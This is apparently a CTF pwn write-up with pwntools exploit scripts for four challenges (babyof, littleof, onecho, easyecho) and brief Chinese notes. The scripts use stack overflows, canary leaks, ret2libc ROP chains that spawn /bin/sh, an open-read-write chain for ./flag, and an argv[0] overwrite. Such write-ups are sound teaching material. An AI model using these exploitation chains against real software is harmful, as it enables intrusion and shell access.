babyof
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| from pwn import*
r=process('./babyof')
elf = ELF('./babyof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')
pop_rdi_ret = 0x0400743
main_addr = 0x040066B
pop_rsi_r15_ret = 0x0400741
payload = b'a'*0x40 + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main_addr)
r.recv()
r.sendline(payload)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x40 + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(pop_rsi_r15_ret)
payload += p64(0)*2
payload += p64(sys)
r.recv()
r.sendline(payload)
r.interactive()
|
littleof
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| from pwn import*
r =process('./littleof')
elf = ELF('./littleof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')
pop_rdi_ret = 0x0400863
main_addr = 0x0400789
pop_rsi_r15_ret = 0x0400861
payload = b'A'*(0x50-8)
r.recvuntil("?")
r.sendline(payload)
r.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(r.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a
success(hex(canary))
payload = b'a'*(0x50-8) + p64(canary) + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main_addr)
r.recvuntil("!")
r.sendline(payload)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'A'*(0x50-8)
r.recvuntil("?")
r.sendline(payload)
r.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(r.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a
success(hex(canary))
payload = b'a'*(0x50-8) + p64(canary) + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(pop_rsi_r15_ret)
payload += p64(0)*2
payload += p64(sys)
r.recvuntil("!")
r.sendline(payload)
r.interactive()
|
onecho
小 trick 用 pop 绕过特定位置形参校验
1
2
3
4
5
6
7
8
9
10
11
12
13
| void *__cdecl sub_80495C6(void *dest, int a2)
{
char s[256];
int v4;
v4 = 0;
__isoc99_scanf(&unk_804A363, s);
v4 = strlen(s);
if ( v4 < a2 )
return memcpy(dest, s, v4 + 1);
puts("[?] Error?");
return memcpy(dest, s, a2 - 1);
}
|
Open 死活不生效,最后想起来部分情况下需要设置第二个参数 0 ,只读模式打开
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
from pwn import *
r = process("./onecho")
elf = ELF("./onecho")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
payload = b'\x00'+b'a'*(0x10c-1)
payload += b'b'*0x4
payload += p32(0x08049022)+p32(0x0804C100)
payload += p32(elf.plt['puts'])+p32(0x08049022)+p32(elf.got['puts'])
payload += p32(elf.plt['read'])+p32(0x08049811)+p32(0)+p32(0x0804C350)+p32(0x100)
payload += p32(0x0804973F)
r.sendline(payload)
sleep(0.2)
r.send("./flag\x00\x00")
r.recvuntil("name:\n")
leak_addr = u32(r.recv(4))
libc_base = leak_addr - libc.sym['puts']
payload = b'\x00'+b'b'*(0x10c-1)
payload += b'c'*0x4
payload += p32(0x08049022)+p32(0x0804C600)
payload += p32(0x08049022)+p32(0x0)
payload += p32(libc_base+libc.sym['open'])+p32(0x08049812)+p32(0x0804C350)+p32(0)
payload += p32(elf.plt['read'])+p32(0x08049811)+p32(3)+p32(0x0804C600)+p32(0x100)
payload += p32(elf.plt['write'])+p32(0x08049811)+p32(1)+p32(0x0804C600)+p32(0x3000)
payload += p32(0x0804973F)
r.sendline(payload)
r.interactive()
|
easyecho
主动触发 cannary 保护,打印出 argv[0] 信息,利用栈溢出覆盖 argv[0] 为 flag 地址
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| from pwn import *
context.log_level='debug'
r=process('./easyecho')
r.recv()
r.sendline('1111111111111111')
r.recvuntil('Welcome 1111111111111111')
leak=u64(r.recv(6).ljust(8,b'\x00'))
flag=leak-0xcf0+0x202040
print(hex(flag))
print(r.recv())
r.sendline('backdoor')
print(r.recv())
payload=b'a'*(0x167)+b'b'+p64(flag)
r.sendline(payload)
gdb.attach(r)
print(r.recv())
r.sendline("exitexit")
r.interactive()
|
PWNI
2018 国赛原题
